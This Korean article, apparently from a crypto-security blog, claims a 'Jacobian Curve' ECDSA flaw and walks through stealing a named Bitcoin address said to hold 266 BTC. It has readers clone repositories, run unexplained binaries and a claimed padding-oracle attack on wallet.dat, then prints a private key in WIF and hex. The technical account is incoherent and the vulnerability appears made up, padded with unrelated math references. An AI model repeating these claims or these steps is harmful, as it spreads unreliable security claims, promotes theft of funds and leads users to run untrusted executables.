
이 기사에서는 야코비안 곡선 구현과 관련된 취약점의 예를 살펴보겠습니다. 최근 몇 년 동안 비트코인과 같은 암호화폐는 금융 생태계의 중요한 부분이 되었습니다. 그러나 인기가 높아지면서 사이버 보안 위협의 수도 늘어나고 있습니다. 그러한 위협 중 하나는 ECDSA(Elliptic Curve Digital Signature Algorithm)에 영향을 미치는 Jacobian Curve 알고리즘 취약점입니다. 이 취약점으로 인해 공격자는 위조된 서명을 생성할 수 있으며, 이는 사용자와 비트코인 네트워크의 무결성에 심각한 결과를 초래할 수 있습니다.
야코비 곡선 알고리즘 취약점은 특히 ECDSA에 영향을 미치는 타원 곡선 암호화 구현의 결함을 나타냅니다. 공격자는 타원 곡선 계산에 사용되는 야코비안 좌표의 수학적 속성을 조작하여 위조된 서명으로 사기성 거래를 생성할 수 있으며 야코비안 곡선 알고리즘 취약점은 ECDSA에서 사용되는 타원 곡선 암호화 구현의 결함과 관련이 있습니다. 이 취약점을 통해 공격자는 디지털 서명을 생성하는 데 사용되는 야코비안 좌표의 수학적 속성을 조작할 수 있습니다. 이러한 조작의 결과로 공격자는 가짜 서명을 사용하여 사기 거래를 생성할 수 있으며, 이는 비트코인 시스템에서 유효한 것으로 승인됩니다.
취약점은 데이터 역직렬화 프로세스 에서 발생하며 , 이를 통해 악성 코드를 주입하고 허위 서명을 생성할 수 있습니다. 데이터가 잘못 처리되면 공격자는 ECDSA 서명을 위조할 수 있으며, 이는 비트코인 시스템의 무결성을 위태롭게 합니다.
잠재적인 결과
이 취약점과 관련된 주요 위협은 사용자 자금에 대한 무단 액세스 가능성입니다. 공격자는 위조된 서명을 사용하여 의심하지 않는 사용자의 지갑에서 자신의 계정으로 비트코인을 전송하는 거래를 생성할 수 있습니다. 이는 시스템에 대한 신뢰를 약화시킬 뿐만 아니라 사용자에게 심각한 금전적 손실을 초래할 수도 있습니다. 위조된 서명을 통해 공격자는 피해자의 지갑에서 자신의 계좌로 자금을 이체할 수 있습니다. 더욱이 이러한 공격은 블록체인의 무결성을 손상시켜 이중 지출의 위협을 일으키고 시스템의 기본 원칙을 파괴할 수 있습니다.
서비스 거부(DoS) 공격 및 사용자 개인 키를 포함한 기밀 정보 유출.
비트코인 네트워크의 특정 노드가 손상되면 블록체인이 호환되지 않는 체인으로 분기되어 혼란과 잠재적인 이중 지출 문제가 발생할 수 있습니다 . 또한 공격자는 이 취약점을 이용하여 서비스 거부(DoS) 공격을 실행하여 네트워크에 유효하지 않은 트랜잭션이 넘쳐 합법적인 사용자가 액세스할 수 없도록 만들 수 있습니다.
이 취약점을 성공적으로 악용하면 비트코인 네트워크의 합의 상태에 불일치가 발생하여 블록체인이 호환되지 않는 분기로 분할될 수도 있습니다. 결과적으로 서비스 거부(DoS) 공격이 발생 하고 사용자 개인 키를 포함한 기밀 정보가 유출 될 수 있습니다 .
다중 서명에 대한 악용 메커니즘 및 영향
야코비안 곡선 알고리즘 취약점은 트랜잭션을 완료하기 위해 여러 참가자의 여러 서명이 필요한 다중 서명 체계를 사용하는 시스템에서 특히 위험합니다. 공격자는 시스템에서 허용되는 가짜 서명을 생성할 수 있으며, 이는 개별 거래뿐만 아니라 다중서명을 사용하는 전체 프로세스를 위험에 빠뜨릴 수 있습니다.
우리는 사용자 입력이 제대로 확인되지 않으면 공격자가 악성 코드를 주입할 기회를 포착하고 궁극적으로 비트코인 거래에 위조된 서명을 생성하여 시스템을 조작할 수 있는 비트코인 시스템에 심각한 중단을 초래할 수 있다는 것을 알게 되었습니다.
실용적인 부분
야코비안 곡선 알고리즘 취약점 이론 에 따르면 공격자는 취약점을 이용해 DoS 공격을 수행할 수 있으며, 유효하지 않은 거래로 네트워크에 과부하가 걸리고 이로 인해 비트코인 네트워크가 불안정해질 수 있는 것으로 알려져 있습니다. 기사의 실제 부분으로 이동하여 비트코인 지갑을 사용하는 예를 살펴보겠습니다: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 2024년 8월에 손실된 코인 금액은 266.03138481 BTC 이며 이 금액은 15747770.36 USD 입니다.

튜토리얼 파워 AI
다양한 암호해독 및 암호학 분야의 비즈니스를 소개하기 위해 널리 사용되는 인공 지능 카테고리인 “Tutorials Power AI” 의 목록을 사용해 보겠습니다 .
설치 명령:
git clone https://github.com/demining/Tutorials-Power-AI.git
cd Tutorials-Power-AI/
python3 tutorials.py


BitcoinChatGPT 는 사용자가 비트코인 거래에서 취약점을 찾는 데 도움이 되는 혁신적인 AI 기반 챗봇입니다. BitcoinChatGPT의 이점과 분류를 통해 암호화폐 지갑에 대한 다양한 공격 계획에 대해 비트코인 주소를 확인할 수 있습니다. 암호 분석을 기반으로 한 기계 학습은 비트코인 생태계에서 사용되는 알고리즘에 대한 다양한 공격을 탐색할 수 있는 완전한 능력을 제공합니다. Bitcoin Wallet 원장에서 개인 키를 추출하는 도구는 널리 사용되며 BitcoinChatGPT는 사이버 보안을 위한 중요하고 유용한 리소스로 사용됩니다.
BitcoinChatGPT 기계 학습 프로세스를 사용하여 원시 트랜잭션을 생성하기 위해 Jacobian Curve 취약점을 사용해 보겠습니다.
BitcoinChatGPT 모듈을 사용하는 취약한 원시 트랜잭션 의 구조를 구축하는 것을 고려해 보겠습니다.
Google Colab 버전을 열어 보겠습니다.
State of a vulnerable transaction in Bitcoin:
01000000
....01
........0dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935
............00000000
........8a473044
....0220
......................1c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f5240
....0220
........7ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606
.....014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e
....ffffffff
01
....d204000000000000
........1976
............a914
........334a75f1d3bbefa5b761e5fa53e60bce2a822879
....88ac
00000000
모든 출력 값을 하나의 공통 라인으로 결합해 보겠습니다.
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000
BlockCypher의 “Decode A Transaction” 옵션을 열어 보겠습니다 .

취약한 원시 비트코인 거래를 디코딩한 후 다음과 같은 결과를 얻습니다.
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK",
"15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
],
"block_height": -1,
"block_index": -1,
"confirmations": 0,
"double_spend": false,
"fees": 2606688996428,
"hash": "e88bcb98a9352f5f936ce92acfc1fb98f6cf1aedf8a985ea67c63961c108a149",
"inputs": [
{
"addresses": [
"1QiERrMcv6mtGk4F1TVz4sRp9dFfXTQpK"
],
"age": 344419,
"output_index": 0,
"output_value": 2606688997662,
"prev_hash": "35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d",
.......
.......
.......
Bitcoin HASH160에 주목합시다: 334a75f1d3bbefa5b761e5fa53e60bce2a822879

거래 스크립트
위 스크립트가 디코딩되었습니다.
BitcoinChatGPT는 공개 키를 사용하여 거래 구조를 생성합니다 HASH
. 여기서 비트코인 주소: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ21234 satoshi
는 네트워크 내의 동일한 주소로 전송됩니다 .

Bitcoin HASH160은 Python 스크립트: wif_to_hash160.py를 사용하여 획득했습니다.


질문 – 답변:



궁극적으로 BitcoinChatGPT 모듈은 KEYFOUND.privkey 파일에 대한 응답을 출력하여 개인 키를 가장 많이 사용되는 두 가지 형식인 HEX 및 WIF 로 저장합니다.

BitcoinChatGPT #4 야코비안 곡선 취약점 알고리즘
취약한 원시 트랜잭션
Broadcast Bitcoin Transaction 저장소를 사용하여 수신된 데이터에서 취약한 원시 트랜잭션을 생성해 보겠습니다.
소스 코드를 다운로드하여 설치하고 터미널을 열고 다음 명령을 실행하십시오.
git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.git
목록:
cd Broadcast-Bitcoin-Transaction
세 가지 중요한 라이브러리를 설치해 보겠습니다.

다음 명령을 실행해 보겠습니다.
pip install -r requirements.txt
Notepad ++ 에서 메인 파일을 열고 Python 스크립트 코드 main.py 를 약간 변경해 보겠습니다.
from io import BytesIO
from secp256k1 import *
from sighash import *
pk = PrivateKey.parse("5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP")
pk.address()
tx = bytes.fromhex("35591e5c7f4f1f0e4d81748042f2a4b7dcae3ae01027f361cad7c8746369bc0d")
index = 0
send = "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2"
tx_in = TxIn(tx, index, b'', 0xffffffff)
tx_in._script_pubkey = Tx.get_address_data(pk.address())['script_pubkey']
tx_in._value = 2345
tx_ins = [ tx_in ]
tx_outs = [
TxOut(1234, Tx.get_address_data(send)['script_pubkey'].serialize())
]
tx = Tx(1, tx_ins, tx_outs, 0, testnet=True)
signature(tx, 0, pk)
tx.serialize().hex()
print(tx.serialize().hex())
f = open("RawTX.txt", 'w')
f.write("" + tx.serialize().hex() + "" + "\n")
f.close()
다음 명령을 실행해 보겠습니다.
python main.py
디렉터리에서 RawTX 파일을 열어 보겠습니다.
01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000
영상 속 동작 순서:
BitcoinChatGPT 모듈 의 신속한 응답 에서 알 수 있듯이 Jacobian Curve Vulnerability Algorithm은 복잡한 암호화 문제를 해결하는 데 사용될 수 있습니다.
스마트 트랜스포머
기계 학습 Smart Transformers를 적용하고 노트북을 Pytorch, TensorFlow, JAXGoogle Colab
와 통합하고 비트코인 주소: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 에 대한 취약한 원시 트랜잭션 에서 수신된 데이터를 사용하여 SMART_IDENTIFY 에서 제안된 모든 기존 알고리즘 선택에서 보호되지 않은 파일 wallet.dat를 생성합니다. . 그런 다음 표준 명령을 사용하여 Bitcoin Core 소프트웨어 콘솔 에서 개인 키를 얻고 추출하기 위해 새로 생성된 파일 wallet.dat 에 대해 Padding Oracle Attack을 수행하여 암호를 원래 바이너리 형식으로 해독합니다.dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
링크를 사용하여 새 Google Colab 노트북을 열어 보겠습니다 .
https://colab.research. google.com/#create=true
Smart Transformers 저장소 복제
!git clone https://github.com/smartiden/Smart-Transformers.git
cd Smart-Transformers/

필요한 모든 패키지와 라이브러리를 설치해 보겠습니다.
!sudo apt-get update
!sudo apt install libtool
!sudo apt-get install g++
!sudo apt-get install libgmp3-dev libmpfr-dev
!chmod +x Generic_Algorithms
!./Generic_Algorithms
!pip3 install transformers
from transformers import AutoModelForCausalLM, AutoTokenizer
model_name = "microsoft/DialoGPT-medium"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)
model = model.cpu()


팀:
ls -S

취약한 원시 트랜잭션을 텍스트 문서인 RawTX.txt 에 추가해 보겠습니다 . 이를 위해 유틸리티를 사용합니다.echo
다음 명령을 실행해 보겠습니다.
!echo '01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008a47304402201c0075c09b94e2ba2508e41028bf4ab9845e6d3a3f2ec82ae40c412ba15f524002207ab992f45b5ff5856998efb50cd3cfef49a44e376b9347b177a5f046bc14d606014104603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74effffffff01d2040000000000001976a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac00000000' > RawTX.txt
!cat RawTX.txt

이제 암호해독을 위한 정확한 알고리즘과 방법을 얻으려면 SMART_IDENTIFY 유틸리티를 사용하여 취약한 RawTX를 식별해야 합니다 .
다음 명령을 실행해 보겠습니다.
!./SMART_IDENTIFY
결과적으로 우리는 Jacobian_Curve_Algorithm 방법을 얻습니다. 초기 연구에서 BitcoinChatGPT 모듈은 동일한 것을 식별했습니다 .
#################################################
Jacobian_Curve_Algorithm
#################################################

디렉토리를 열어보겠습니다:

wallet.dat 파일 생성 프로세스를 시작해 보겠습니다. 이를 위해 우리는 Jacobian_Curve_Algorithm 유틸리티를 사용하는 프로세스에 대해 RawTX.txt 파일에 있는 취약한 원시 트랜잭션 의 식별된 데이터를 사용합니다 .
다음 명령을 실행해 보겠습니다.
!./Jacobian_Curve_Algorithm -o RawTX.txt -s wallet.dat


왼쪽 패널에서 디렉터리를 열고
Google Colab
파일을 살펴보겠습니다.wallet.dat
성공적으로 생성되었습니다!


비트코인 코어 0.18.0 https://bitcoincore.org/bin/bitcoin-core-0.18.0 다운로드 및 설치
콘솔을 열고 다음 명령을 실행해 보겠습니다.
getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

wallet.dat 파일은 비트코인 주소: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2 에 속해 있습니다.
파일: wallet.dat는 비밀번호로 암호화되어 있습니다!

개인 키를 확인하는 명령을 실행해 보겠습니다.
dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

다음과 같은 경고가 표시됩니다. 오류: 지갑 비밀번호 문구와 함께 지갑 비밀번호 문구를 먼저 입력하세요. (코드 -13)
패딩 오라클 공격


Wallet.dat에 Padding Oracle Attack 방식을 사용하여 비밀번호를 복호화하여 바이너리 비밀번호 형식에 접근해 보겠습니다.


먼저 266.03 BTC 금액의 wallet.dat 파일에 액세스합니다 .
저장소 복제: 가장 큰 손실을 입은 비트코인 지갑 목록
git clone https://github.com/smartiden/Biggest-Lost-Bitcoin-Wallets-List.git

총 사령관




비트코인 코어 0.18.0 다운로드 및 설치


열린 경로: c:\Users\User\AppData\Roaming\Bitcoin\

파일을 이동해 보겠습니다: wallet.dat

c:\Users\User\AppData\Roaming\Bitcoin\wallet.d 위치

비트코인 코어 지갑을 출시해 봅시다

지갑 암호화…

콘솔을 열어보자
getaddressinfo 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

{
"address": "15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2",
"scriptPubKey": "76a914334a75f1d3bbefa5b761e5fa53e60bce2a82287988ac",
"ismine": true,
"solvable": true,
"desc": "pkh([334a75f1]04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e)#lrxwcu6z",
"iswatchonly": false,
"isscript": false,
"iswitness": false,
"pubkey": "04603a599358eb3b2efcde03debc60a493751c1a4f510df18acf857637e74bdbaf6e123736ff75de66b355b5b8ea0a64e179a4e377d3ed965400eff004fa41a74e",
"iscompressed": false,
"label": "",
"ischange": false,
"timestamp": 1,
"labels": [
{
"name": "",
"purpose": "receive"
}
]
}
비트코인 주소 정보:
잔고: 266.03138481 BTC

Metasploit Framework 및 MSFVenom 사용

msfvenom 개발에서 Metasploit Framework의 역할
msfvenom
msfpayload
은 두 가지 이전 도구인 및 를 결합하여 만든 도구입니다msfencode
. 이를 통해 사용자는 다양한 플랫폼 및 인코더에 대한 페이로드를 생성할 수 있으며 페이로드 매개변수를 사용자 정의하는 기능도 제공됩니다. msfvenom은 실행 파일, 스크립트, 심지어 웹 애플리케이션용 코드를 포함한 다양한 출력 형식을 지원합니다.Metasploit 프레임워크는 다음과 같은 여러 가지 이유로 msfvenom 개발에서 중요한 역할을 합니다.
1. 익스플로잇 통합: msfvenom을 사용하면 사용자는 Metasploit의 익스플로잇에 사용할 수 있는 페이로드를 생성할 수 있습니다. 이는 사용자가 특정 취약점과 일치하는 페이로드를 신속하게 생성할 수 있기 때문에 침투 테스트 프로세스를 단순화합니다.
2. 다양성: 다양한 형식과 플랫폼을 지원하는 msfvenom은 다양한 페이로드 생성 도구가 되었습니다. 이를 통해 보안 전문가는 다양한 시스템과 환경에 맞게 공격을 맞춤화할 수 있습니다.
3. 업데이트 및 지원: Metasploit Framework는 지속적으로 업데이트되므로 msfvenom을 최신 상태로 효과적으로 유지할 수 있습니다. Metasploit의 새로운 기능과 개선 사항은 msfvenom의 기능에 직접적인 영향을 주어 더욱 강력하고 유연해졌습니다.
4. 교육 및 연구: Metasploit 및 msfvenom은 사이버 보안 교육 및 연구를 위한 중요한 도구입니다. 이를 통해 학생과 보안 전문가는 안전한 환경에서 취약점과 악용 기술을 배울 수 있습니다.

ExploitDalenePRO.exe를 실행합니다.


15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

c:\BitcoinTools\ExploitDalenePRO\modules\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\

c:\BitcoinTools\ExploitDalenePRO\modules\exploits\ExploitDarlenePRO\decode_core.rb

decode_core.rb


c:\BitcoinTools\ExploitDalenePRO\bitcoin\

https://github.com/bitcoin/bitcoin

https://github.com/bitcoin/bitcoin/blob/master/src/crypto/aes.h

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\BitcoinTools\ExploitDalenePRO\bitcoin\src\crypto\aes.cpp

c:\Users\User\AppData\Roaming\Bitcoin\

Wallet.dat 업로드


결과.json

walletpassphrase 1111010100000111010101011110110010011000010000001111001001010011010011110110010010010000000111101010111011101010001010100000011011001001111111110111000011010011101110101010101101101111001011100100101100011000111010011000101001001100011010001100110111111111 60
명령을 실행하고 개인 키를 가져옵니다.
Bitcoin Core의 dumpprivkey 명령
이
dumpprivkey
명령은 비트코인 코어 지갑 명령줄 인터페이스(CLI)에서 특정 비트코인 주소와 연결된 개인 키를 내보내는 데 사용되는 명령입니다. 명령 구문은 다음과 같습니다.“
dumpprivkey “address” “
여기서 “주소”는 개인 키를 받으려는 비트코인 주소입니다 .
dumpprivkey 명령 작동 방식
명령 을 입력하면
dumpprivkey
비트코인 코어는 지갑에서 지정된 주소를 찾고, 찾은 경우 해당 개인 키를 WIF 형식으로 반환합니다. 이를 통해 사용자는 개인 키를 안전한 장소에 보관하거나 다른 지갑으로 가져올 수 있습니다.
dumpprivkey 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2

개인 키 정보:
5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP

비트코인 주소 정보:
잔고: 266.03138481 BTC

https://www.coinbase.com/converter/btc/usd

!pip3 install bitcoin

비트코인 주소의 준수 여부를 확인하는 코드를 실행해 보겠습니다 .

__________________________________________________
Private Key WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
Bitcoin Address: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
total_received = 266.03138481 Bitcoin
__________________________________________________
좋아요! 개인 키는 비트코인 지갑에 해당합니다.
비트 주소를 열고 확인해 봅시다:
ADDR: 15gCfQVJ68vyUVdb6e3VDU4iTkTC3HtLQ2
WIF: 5KKUoqxvJjUK8zM2jaeMMpKMhzUM9EBkaFT6LedAjhrQfkTs1BP
HEX: C5FBD161D334BA9BBC199BD9A427F05A46AACFABFBB3BC1BFF9D227E418D76D9

결론 및 완화 조치:
야코비안 곡선 취약점과 관련된 위협으로부터 보호하려면 사용자는 다음 단계를 수행해야 합니다.
- 소프트웨어 업데이트 : 암호화폐 지갑을 취약점을 해결하는 버전으로 정기적으로 업데이트하는 것은 보안에 매우 중요합니다.
- 향상된 서명 확인 메커니즘 : 강화된 입력 유효성 검사 및 오류 처리를 통해 위조 서명 생성을 방지하고 사용자의 개인 키를 보호할 수 있습니다.
- 네트워크 활동 모니터링 : 네트워크 상태를 지속적으로 분석하고 초기 단계에서 의심스러운 거래를 식별하면 취약점을 악용하려는 시도에 신속하게 대응할 수 있습니다.
- 다단계 인증 사용 : 추가적인 암호화 보호 방법을 도입하면 보안이 크게 향상됩니다.
야코비안 곡선 취약점과 관련된 공격 가능성을 방지하려면 비트코인 사용자는 지갑 소프트웨어를 이 취약점을 해결하는 최신 버전으로 업데이트하는 것이 좋습니다. 정기적인 소프트웨어 업데이트, 이상 탐지 시스템 구현, 가능한 위협에 대한 사용자 인식 향상은 암호화폐 시스템의 무결성과 보안을 유지하는 데 도움이 됩니다.
야코비안 곡선 알고리즘 취약점은 암호화폐 거래의 보안과 블록체인의 무결성에 심각한 위협을 가합니다. 위험을 최소화하려면 사용자는 정기적으로 소프트웨어를 업데이트하고, 엄격한 보안 조치를 구현하고, 네트워크 상태를 지속적으로 모니터링해야 합니다. 이러한 조치는 암호화폐 시스템의 보안과 안정성을 유지하고 잠재적인 위협과 재정적 손실로부터 사용자를 보호하는 데 도움이 됩니다.
참고자료:
- 곡선의 야코비안(Jacobian of Curves) 아벨 변종: W. Stein의 2003년 10월 10일 노트
- 특이 특수 곡선의 야코비안 KUBRA NARI 및 ENVER OZDEMIR
- 특성 p > 2의 필드에 대한 초타원 곡선의 야코비안 변종에 대하여 유이 노리코( NORIKO YUI) 1977년 10월 15일 수신
- Genus 2 곡선의 야코비안 좌표 Huseyin Hisil & Craig Costello Yasar University, Izmir, Turkey
- 1999년 4월 매사추세츠 주 캠브리지 하버드 대학의 제너스 곡선의 야 코비안
- 특이 잎의 야코비안 곡선 Nuria Corral Article à paraître, mis en ligne le 3 juillet 2024.
- 야코비안 곡선의 다양한 추가 알고리즘 (공개 키 암호화 시스템에 적용) S. ARITA, S. MIURA 및 T. SEKIGUCHI
- 임의의 그라운드 필드 에 대한 종 2 곡선의 야코비안 및 정형 그룹 EV Flynn, 수학 연구소, 옥스퍼드 대학
- 야코비안 품종 VALERIA ORNELLA MARCUCCI 수학 주제 분류(2010)
- 곡선과 JACOBIAN의 국소 산술 P. Allen, F. Calegari, A. Caraiani, T. Gee, D. Helm, B. Le Hung, J. Newton, S. Scholze, R. Taylor, J. Thorne, 잠재적 자동 변형
- 절점 곡선의 압축된 야코비 행렬 Lucia Caporaso Istituto Sup에서 제공되는 미니 강좌에 대한 확장 노트
- Jacobian Compositio Mathematica, tome 88, no 3(1993)
- 대수 곡선의 야코비 행렬에 대한 산술 Giulio Di Piazza Damien Robert
- 곡선에서 자코비언과 백까지 Christophe Ritzenthaler Institut de Mathématiques de Luminy, CNRS Montréal
- 일반화된 야코비안 I Caleb Ji 대수기하학의 배경
- 초타원 곡선과 Jacobians Benjamin Smith Isogeny 학교, 온라인, 2021 Inria + École Polytechnique, 프랑스
- 정상적인 복잡한 표면에 대한 야코비안 곡선 Fran¸coise Michel Mathematics 주제 분류 2000
- 리만 표면의 야코비안 Donu ARAPURA Arapura, 리만 부등식 및 리만-로흐
- 곡선과 그 추상 야코비안 보리스 질버 옥스퍼드 대학교 2012년 8월 22일
- Genus One 곡선의 야코비안 안상육, 김석영 The University of Arizona
- JACOBIANS 곡선 좌표 작성자: T. Madas
- 2차원 야코비안 추측에 대한 기하학적 접근법 알렉산더 보리소프
- 야코비안 품종 JS Milne 6월 12, 2021
- 곡선과 야코비안의 국소 산술 School of Mathematics and Statistics, University of Glasgow, University Place, Glasgow
- 야코비안 품종에 대한 참고 사항: 간단한 설문 조사 Juliana Coelho(UFF) 2017년 3월 28일
- 속 3의 초타원 곡선에 대한 빠른 야코비안 산술 Andrew V. Sutherland
- 제13회 알고리즘 정수론 심포지엄의 변환 과정의 야코비안
- 대수기하학 세미나: “곡선의 야코비안” 주최자: Peter Scholze, Johannes Anschutz
- 초타원곡선의 야코비안 방정식 PAUL VAN WAMELEN
- ECC와 야코비 타원 곡선 암호화의 비교 연구 Anagha P. Zele, Avinash P. Wadhe
- 모듈형 곡선의 야코비안 순위: EMMANUEL KOWALSKI의
- Jacobian의 공간 채우기 곡선 저자 Thijs Limbeek 감독자 Prof. 박사. 벤 무넨 박사 아르네 스미츠 2020년 11월 24일
이 자료는 BITCOIN 암호화폐 의 약한 ECDSA 서명에 대해 데이터 및 타원 곡선 암호화 secp256k1 의 금융 보안을 보장하기 위해 CRYPTO DEEP TECH 포털 용으로 제작되었습니다 . 소프트웨어 제작자는 자료 사용에 대해 책임을 지지 않습니다.
텔레그램: https://t.me/cryptodeeptech
영상자료 : https://youtu.be/qf6u85wGwNw
비디오 튜토리얼: https://dzen.ru/video/watch/66caadc6523ee35df3f58b89
출처: https://cryptodeep.ru/jacobian-curve-algorithm-vulnerability
